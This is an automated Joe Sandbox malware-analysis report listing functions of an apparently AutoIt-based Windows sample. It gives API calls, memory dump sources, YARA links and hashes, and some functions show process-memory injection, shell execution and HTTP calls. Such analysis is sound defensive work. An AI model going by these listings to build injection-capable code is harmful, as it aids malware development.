                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1489400265-0
                                                                                                                                                                  • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                  • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                                                  • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                                                  • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                                                  Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1042038666-0
                                                                                                                                                                  • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                  • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                                                  • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                                                  • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                                                  Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                                                  • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                  • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                                                                  • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                                                                  • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                                                  Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                                  • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                                  • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize
                                                                                                                                                                  • String ID: .lnk
                                                                                                                                                                  • API String ID: 948891078-24824748
                                                                                                                                                                  • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                  • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                                  • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                  • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                  Function 0045F790 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                                                                                                                                                  • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                                                                                                                                                  • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$Default
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 1306138088-4108050209
                                                                                                                                                                  • Opcode ID: 148a14dc0ff86175c05be7828017775907b49b82fd90e2f6ff65525b1e0adf94
                                                                                                                                                                  • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                                                                                                                                                  • Opcode Fuzzy Hash: 148a14dc0ff86175c05be7828017775907b49b82fd90e2f6ff65525b1e0adf94
                                                                                                                                                                  • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                                                                                                                                                  Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                                                                                                                    • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                                                                                                                    • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                                                                                                                    • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                                                                                                                    • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                                                  • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                  • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                                                                                                                  • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                                                                                                                  • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                                                                                                                                  Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseExecuteHandleShell
                                                                                                                                                                  • String ID: <$@
                                                                                                                                                                  • API String ID: 283469938-1426351568
                                                                                                                                                                  • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                                                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                                                                                                  • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                                                                                                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                                                                                                  Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3705125965-3916222277
                                                                                                                                                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                                                                                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                                                                                                  Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                                                                                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                                                                                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 135850232-4108050209
                                                                                                                                                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                                                                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                                                                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                                                                                  Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Long
                                                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                                                                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                                                                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                                                                                  Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID: AU3_GetPluginDetails
                                                                                                                                                                  • API String ID: 145871493-4132174516
                                                                                                                                                                  • Opcode ID: 483cb9712bfe015c868868d685968ce42f76b7ce4d7eac705d35beadd328b180
                                                                                                                                                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 483cb9712bfe015c868868d685968ce42f76b7ce4d7eac705d35beadd328b180
                                                                                                                                                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                                                                                                  Function 0044BBD2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$FullMoveNameOperationPathlstrcmpi
                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                  • API String ID: 1148786053-1173974218
                                                                                                                                                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                                  Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
